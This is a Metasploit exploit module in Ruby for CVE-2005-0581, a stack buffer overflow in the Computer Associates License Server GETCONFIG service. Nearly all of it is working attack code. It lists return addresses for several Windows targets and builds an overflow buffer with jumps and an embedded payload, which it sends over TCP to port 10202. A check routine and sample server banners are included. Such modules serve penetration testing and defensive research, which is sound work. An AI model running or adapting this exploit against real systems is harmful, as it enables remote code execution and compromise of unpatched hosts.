modules/exploits/windows/license/calicserv_getconfig.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Computer Associates License Server GETCONFIG Overflow',
'Description' => %q{
This module exploits an vulnerability in the CA License Server
network service. By sending an excessively long GETCONFIG
packet the stack may be overwritten.
},
'Author' =>
[
'hdm', # original msf v2 module
'aushack', # msf v3 port :)
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2005-0581' ],
[ 'OSVDB', '14389' ],
[ 'BID', '12705' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# As much as I would like to return back to the DLL or EXE,
# all of those modules have a leading NULL in the
# loaded @ address :(
# name, jmp esi, writable, jmp edi
#['Automatic', {} ],
#
# aushack - tested OK Windows XP English SP0-1 only 20100214
['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
],
'DisclosureDate' => '2005-03-02'))
register_options(
[
Opt::RPORT(10202),
])
end
def check
connect
banner = sock.get_once
sock.put("A0 GETCONFIG SELF 0<EOM>")
res = sock.get_once || ''
disconnect
if (res =~ /OS\<([^\>]+)/)
vprint_status("CA License Server reports OS: #{$1}")
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
banner = sock.get_once
if (banner !~ /GETCONFIG/)
print_status("The server did not return the expected greeting!")
end
# exploits two different versions at once >:-)
# 144 -> return address of esi points to string middle
# 196 -> return address of edi points to string beginning
# 148 -> avoid exception by patching with writable address
# 928 -> seh handler (not useful under XP SP2)
buff = rand_text_alphanumeric(900)
buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses
buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi
buff[148, 4] = [target['Rets'][1]].pack('V') # writable address
buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address
buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi
buff[272, payload.encoded.length] = payload.encoded
sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
sock.put(sploit)
handler
disconnect
end
end
=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end